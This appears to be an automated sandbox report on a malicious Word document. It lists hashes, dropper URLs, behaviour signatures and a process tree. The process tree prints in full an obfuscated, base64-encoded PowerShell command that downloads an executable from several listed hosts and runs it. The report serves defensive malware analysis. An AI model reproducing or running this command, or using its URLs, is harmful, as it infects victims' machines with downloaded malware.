Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    14/08/2024, 15:06

General

  • Target

    969793d6e2eaec03f204154d88cb4f49_JaffaCakes118.doc

  • Size

    166KB

  • MD5

    969793d6e2eaec03f204154d88cb4f49

  • SHA1

    bf6a1029b1898730200a5baad7946f767aeb85d9

  • SHA256

    f937aa80619d0e37226ade07e800da5677a6749ba0b0bc4427fc620e9b8d98b2

  • SHA512

    f69c8b49468e382beca1d67eeb85537b531920b45132f9a1372a41dad79e630d10209bf014a50cedfa9dafd86655cf168d7a185dd176cc9bd8681c8eabdbec0e

  • SSDEEP

    1536:pARD3bNqfNpu39IId5a6XP3Mg8afmqzdotKdz/Rek6Ef3Ei9WEvOE:OR1qf69xak3MgxmRKl/R89i9WAOE

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://odeftg.com/odeftg.com/S/

exe.dropper

http://hbprivileged.com/info/S/

exe.dropper

http://equipamentosmix.com/10/U/

exe.dropper

http://mianusman.com/cgi-bin/Fo/

exe.dropper

https://www.hairlineunisexsalon.com/demo/CyD/

exe.dropper

http://liulibug.com/wp-admin/8Aw/

exe.dropper

https://fcbc.group/wp-includes/O/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\969793d6e2eaec03f204154d88cb4f49_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1940
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1992
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD JABRAGsAYwBtADEAawB4AD0AKAAoACcAWgAnACsAJwB6AHAAJwApACsAJwAyADUAJwArACcAMABvACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAVQBTAEUAcgBwAFIATwBGAGkAbABFAFwARwAwAFcAcAB2AFoAQQBcAGQAVQB1ADcAYwB6AHQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIAZQBjAHQATwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBDAFUAUgBJAGAAVABZAFAAYABSAE8AVABvAEMAYABvAEwAIgAgAD0AIAAoACgAJwB0AGwAJwArACcAcwAxADIALAAgACcAKwAnAHQAJwApACsAJwBsAHMAJwArACcAMQAxACcAKwAoACcALAAnACsAJwAgAHQAbABzACcAKQApADsAJABZAF8AcQBsAHkAegA0ACAAPQAgACgAKAAnAFYAZwAnACsAJwAxACcAKQArACcAeQA1ACcAKwAnAGwAJwApADsAJABDAGUAZAA2AHcAMgBpAD0AKAAoACcARwByACcAKwAnADQAJwApACsAKAAnAHkAJwArACcAbwB3AHIAJwApACkAOwAkAFUAZQA0AF8AZgBsAGUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAOQBJACcAKwAoACcAawAnACsAJwBHADAAJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwB2AHoAJwApACsAJwBhACcAKwAoACcAOQBJAGsAJwArACcARAB1AHUANwAnACsAJwBjAHoAdAA5AEkAawAnACkAKQAgACAALQBjAFIARQBwAEwAQQBDAEUAIAAoAFsAQwBoAEEAUgBdADUANwArAFsAQwBoAEEAUgBdADcAMwArAFsAQwBoAEEAUgBdADEAMAA3ACkALABbAEMAaABBAFIAXQA5ADIAKQArACQAWQBfAHEAbAB5AHoANAArACgAJwAuAGUAJwArACcAeABlACcAKQA7ACQAWQBsAGMAcQA4AGsAagA9ACgAJwBFAGcAJwArACgAJwBsAGMANwBfACcAKwAnADcAJwApACkAOwAkAEMAbwA5ADcAcQB0AGsAPQAuACgAJwBuACcAKwAnAGUAdwAnACsAJwAtACcAKwAnAG8AYgBqAGUAYwB0ACcAKQAgAE4ARQB0AC4AVwBFAEIAQwBsAGkAZQBuAFQAOwAkAFcAZABnAG4AMgBrAGoAPQAoACcAaAAnACsAJwB0AHQAJwArACgAJwBwACcAKwAnADoALwAnACkAKwAnAC8AbwAnACsAJwBkAGUAJwArACgAJwBmACcAKwAnAHQAZwAnACkAKwAnAC4AYwAnACsAJwBvAG0AJwArACgAJwAvACcAKwAnAG8AZABlACcAKQArACgAJwBmAHQAZwAnACsAJwAuAGMAbwBtAC8AJwApACsAKAAnAFMAJwArACcALwAqACcAKQArACgAJwBoAHQAdAAnACsAJwBwACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAnAGgAYgAnACsAJwBwACcAKwAoACcAcgBpACcAKwAnAHYAJwApACsAKAAnAGkAbAAnACsAJwBlACcAKQArACgAJwBnACcAKwAnAGUAZAAnACkAKwAnAC4AYwAnACsAKAAnAG8AbQAvACcAKwAnAGkAJwApACsAKAAnAG4AZgAnACsAJwBvACcAKQArACgAJwAvACcAKwAnAFMALwAqACcAKQArACcAaAAnACsAJwB0ACcAKwAoACcAdABwACcAKwAnADoALwAvAGUAcQAnACkAKwAnAHUAJwArACcAaQAnACsAJwBwACcAKwAoACcAYQBtAGUAJwArACcAbgAnACkAKwAoACcAdABvACcAKwAnAHMAbQBpACcAKQArACcAeAAnACsAJwAuAGMAJwArACgAJwBvACcAKwAnAG0ALwAxACcAKQArACgAJwAwACcAKwAnAC8AVQAnACkAKwAnAC8AJwArACcAKgBoACcAKwAoACcAdAAnACsAJwB0ACcAKwAnAHAAOgAvAC8AbQBpACcAKQArACgAJwBhAG4AdQBzACcAKwAnAG0AYQAnACkAKwAoACcAbgAuACcAKwAnAGMAJwApACsAJwBvACcAKwAoACcAbQAnACsAJwAvAGMAZwBpACcAKQArACcALQBiACcAKwAnAGkAJwArACgAJwBuAC8ARgBvACcAKwAnAC8AJwApACsAJwAqACcAKwAnAGgAJwArACcAdAAnACsAKAAnAHQAcABzADoAJwArACcALwAnACkAKwAnAC8AdwAnACsAJwB3AHcAJwArACgAJwAuAGgAJwArACcAYQBpAHIAbABpAG4AZQB1AG4AaQAnACsAJwBzAGUAeABzACcAKQArACgAJwBhAGwAJwArACcAbwBuAC4AJwApACsAJwBjACcAKwAoACcAbwBtAC8AJwArACcAZAAnACsAJwBlAG0AJwApACsAKAAnAG8ALwBDAHkAJwArACcARAAnACsAJwAvACoAJwApACsAJwBoAHQAJwArACgAJwB0AHAAJwArACcAOgAvACcAKQArACgAJwAvAGwAaQB1ACcAKwAnAGwAaQAnACkAKwAnAGIAJwArACgAJwB1AGcALgAnACsAJwBjAG8AJwApACsAJwBtAC8AJwArACgAJwB3AHAAJwArACcALQBhAGQAJwArACcAbQBpAG4ALwAnACkAKwAoACcAOABBAHcAJwArACcALwAqACcAKQArACgAJwBoAHQAJwArACcAdABwAHMAOgAnACsAJwAvAC8AJwApACsAJwBmACcAKwAoACcAYwBiAGMALgAnACsAJwBnACcAKQArACcAcgBvACcAKwAoACcAdQBwACcAKwAnAC8AJwApACsAKAAnAHcAcAAnACsAJwAtACcAKQArACgAJwBpACcAKwAnAG4AYwBsAHUAJwApACsAKAAnAGQAZQBzACcAKwAnAC8ATwAnACsAJwAvACcAKQApAC4AIgBTAFAAYABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEkAaABfAGgAeABwAGIAPQAoACgAJwBUACcAKwAnAGkAZgBrACcAKQArACgAJwBiACcAKwAnAGsAXwAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFkAdwBhADAAdwBxADIAIABpAG4AIAAkAFcAZABnAG4AMgBrAGoAKQB7AHQAcgB5AHsAJABDAG8AOQA3AHEAdABrAC4AIgBkAE8AYAB3AE4AYABsAE8AQQBEAEYAaQBsAEUAIgAoACQAWQB3AGEAMAB3AHEAMgAsACAAJABVAGUANABfAGYAbABlACkAOwAkAEoAYgAzAG4AMwA2AGcAPQAoACcAVwBnACcAKwAoACcAegBxAHEAJwArACcAZwAnACkAKwAnAHUAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAFUAZQA0AF8AZgBsAGUAKQAuACIAbABgAEUAYABOAGcAdABIACIAIAAtAGcAZQAgADIANQA3ADYANAApACAAewAmACgAJwBJAG4AdgBvAGsAZQAnACsAJwAtAEkAdABlACcAKwAnAG0AJwApACgAJABVAGUANABfAGYAbABlACkAOwAkAFoAbQBnAHgAagBzAHQAPQAoACcARwAxACcAKwAoACcAeQBmACcAKwAnAF8AJwApACsAJwA2ADgAJwApADsAYgByAGUAYQBrADsAJABSADEANQBpAHMAYgByAD0AKAAoACcARQBtAHEAJwArACcAMgB3ACcAKQArACcAbgB1ACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVwB6AGMAMAA1AGEAZAA9ACgAKAAnAEYAZAB0ACcAKwAnAGYAJwApACsAJwBzACcAKwAnAHkANwAnACkA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2576

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            19KB

            MD5

            80d487651b36e61846a5ff52f6f5426f

            SHA1

            98e15222b51b8f0085bf22a78cd12e86ab702f13

            SHA256

            b4e118c384e0678c2cca861dd7f4b52053cf06934453e0334e06d661e4609b59

            SHA512

            c909438bba7a8fca2ff4ccd004b3deac7a4fa1489d0b1e42e1bd41a02383edad996515a22e803e7e4a847ea3f7db89e3dff281a84883b54560df84a0d426676a

          • memory/1940-17-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-20-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-6-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-5-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-7-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-8-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-11-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-10-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-9-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-14-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-12-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-13-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-15-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-16-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-0-0x000000002FCC1000-0x000000002FCC2000-memory.dmp

            Filesize

            4KB

          • memory/1940-26-0x0000000005960000-0x0000000005A60000-memory.dmp

            Filesize

            1024KB

          • memory/1940-25-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-19-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-2-0x000000007175D000-0x0000000071768000-memory.dmp

            Filesize

            44KB

          • memory/1940-18-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-27-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-34-0x0000000005960000-0x0000000005A60000-memory.dmp

            Filesize

            1024KB

          • memory/1940-33-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-30-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-29-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-28-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-36-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-37-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-40-0x0000000005960000-0x0000000005A60000-memory.dmp

            Filesize

            1024KB

          • memory/1940-39-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-38-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-35-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-70-0x000000007175D000-0x0000000071768000-memory.dmp

            Filesize

            44KB

          • memory/1940-69-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/1940-51-0x000000007175D000-0x0000000071768000-memory.dmp

            Filesize

            44KB

          • memory/1940-52-0x0000000000370000-0x0000000000470000-memory.dmp

            Filesize

            1024KB

          • memory/1940-53-0x0000000005960000-0x0000000005A60000-memory.dmp

            Filesize

            1024KB

          • memory/1940-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2576-47-0x0000000002290000-0x0000000002298000-memory.dmp

            Filesize

            32KB

          • memory/2576-46-0x000000001B5A0000-0x000000001B882000-memory.dmp

            Filesize

            2.9MB